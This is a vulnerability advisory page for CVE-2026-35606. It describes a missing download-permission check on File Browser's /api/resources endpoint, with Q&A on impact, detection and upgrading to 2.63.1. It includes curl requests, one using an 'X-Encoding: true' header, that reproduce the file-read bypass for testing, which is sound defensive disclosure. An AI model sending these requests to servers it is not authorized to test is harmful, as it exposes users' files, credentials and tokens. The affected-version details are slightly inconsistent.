CVE-2026-35606
Unauthorized File Read via Permission Bypass in File Browser
Publication date: 2026-04-07
Last updated on: 2026-04-16
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| filebrowser | filebrowser | to 2.63.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-35606 is a moderate severity vulnerability in the File Browser project affecting versions up to 2.62.2. The issue occurs in the resourceGetHandler function, which serves full text file content via the /api/resources endpoint without verifying if the user has the Perm.Download permission.
While other endpoints (/api/raw, /api/preview, /api/subtitle) correctly check this permission and deny access when download permission is false, the /api/resources endpoint does not. This allows a user without download permission to read any text file within their scope by either requesting the resource normally and extracting the content from the JSON response or by using the X-Encoding header to receive raw file content.
The root cause is that the handler always loads and returns text content regardless of download permissions, and the code path handling the X-Encoding header also returns raw bytes without permission checks. This is classified as a missing authorization weakness (CWE-862). The vulnerability was fixed in version 2.63.1 by adding proper permission checks.
How can this vulnerability impact me? :
This vulnerability allows users who do not have download permissions to read the full contents of text files within their authorized scope. This can lead to unauthorized disclosure of sensitive information.
- Exposure of sensitive data such as source code.
- Leakage of configuration files.
- Access to credentials and API tokens.
Although path-based authorization is still enforced, the bypass of the download permission check means that users can access file contents they should not be able to download, potentially leading to data breaches or information leakage.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to access the /api/resources endpoint with a user account that has the download permission set to false and checking if full text file content is returned despite the lack of permission.
Specifically, you can test two bypass paths:
- Request /api/resources normally and inspect the JSON response's content field for full text file content.
- Request /api/resources with the HTTP header 'X-Encoding: true' to receive raw file content as application/octet-stream.
If either method returns file content despite the user lacking download permission, the vulnerability is present.
In contrast, requests to /api/raw with the same user should return HTTP 202 Accepted with no content if the permission check is enforced correctly.
Example curl commands to test this might be:
- curl -i -H "Authorization: Bearer <token>" https://<filebrowser-host>/api/resources?path=<file-path>
- curl -i -H "Authorization: Bearer <token>" -H "X-Encoding: true" https://<filebrowser-host>/api/resources?path=<file-path>
- curl -i -H "Authorization: Bearer <token>" https://<filebrowser-host>/api/raw?path=<file-path>
Replace <token>, <filebrowser-host>, and <file-path> with appropriate values for your environment.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade File Browser to version 2.63.1 or later, where this vulnerability is fixed.
The fix ensures that the /api/resources endpoint properly checks the Perm.Download permission flag before serving full text or raw file content, returning HTTP 202 Accepted when download permission is denied.
Until the upgrade can be applied, consider restricting access to the /api/resources endpoint or monitoring and blocking suspicious requests that attempt to exploit this bypass.
Additionally, review user permissions to ensure that only trusted users have download permissions, minimizing exposure.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows users without download permission to read the full contents of text files within their authorized scope, potentially exposing sensitive data such as source code, configuration files, credentials, and API tokens.
Such unauthorized access to sensitive information can lead to non-compliance with common standards and regulations like GDPR and HIPAA, which require strict access controls and protection of sensitive data.
Because the vulnerability bypasses permission checks, it increases the risk of data exposure, which may result in violations of data privacy and security requirements mandated by these regulations.